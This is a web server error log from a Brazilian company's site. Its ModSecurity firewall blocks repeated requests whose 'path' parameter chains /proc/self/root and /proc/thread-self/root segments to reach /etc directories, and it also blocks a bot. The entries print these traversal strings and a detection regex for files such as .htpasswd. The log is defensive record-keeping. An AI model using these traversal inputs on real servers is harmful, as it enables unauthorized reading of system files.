https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:26:28.515153 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.241.31:53208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphtAkwaGbbGflqUZDcgwAAAME"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:26:29.868916 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:36268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphtew_le52K8_3pV2r7AAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:26:31.302747 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:36280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpht0zinOy1jxa1j4fduQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:26:39.643644 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:36282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphv9a6ubjKNq_cu4ZhGQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:26:43.138834 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.241.31:60200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abphwymAPhZkrhU8w4k6EAAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:27:24.563083 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.228.61:45066] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abph7Pu8EFLIOrSqIpvRqgAAAlg"]
[Wed Mar 18 05:27:26.841076 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.244.43:59956] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abph7gkwaGbbGflqUZDckgAAAMQ"]
[Wed Mar 18 05:27:59.727599 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:60204] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpiD-w_le52K8_3pV2sNgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:28:07.245931 2026] [:error] [pid 15051:tid 140411683178240] [client 74.7.241.31:48446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpiFymAPhZkrhU8w4k6KAAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:28:09.756713 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:57210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpiGeoXxyEfFpUF8f83ngAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:28:47.407316 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:57214] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpiPwkwaGbbGflqUZDcwQAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:29:29.244010 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:52822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpiaeyqAr6etmhZHNqGWQAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:30:11.908056 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:58672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpikwkwaGbbGflqUZDc8AAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:30:24.143476 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.241.31:58982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpioCmAPhZkrhU8w4k6VwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:30:34.855014 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:53082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpiqvu8EFLIOrSqIpvR3wAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:31:19.351818 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:42398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpi1-oXxyEfFpUF8f84SAAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:32:04.244007 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:43922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjBMdf6f5d65gmYZSd2QAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:32:13.820152 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:38940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjDSmAPhZkrhU8w4k6kwAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:32:26.172675 2026] [:error] [pid 11816:tid 140411616036608] [client 74.7.228.61:42722] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpjGuw_le52K8_3pV2sqQAAAg8"]
[Wed Mar 18 05:32:27.310947 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.244.43:59886] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpjG-yqAr6etmhZHNqGywAAAEw"]
[Wed Mar 18 05:32:34.310840 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:33268] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjIuyqAr6etmhZHNqG1AAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:32:52.981820 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:40050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjNPu8EFLIOrSqIpvSIAAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:33:23.015873 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:59022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjU-oXxyEfFpUF8f84pQAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:33:24.410953 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:58228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpjVAkwaGbbGflqUZDdQQAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
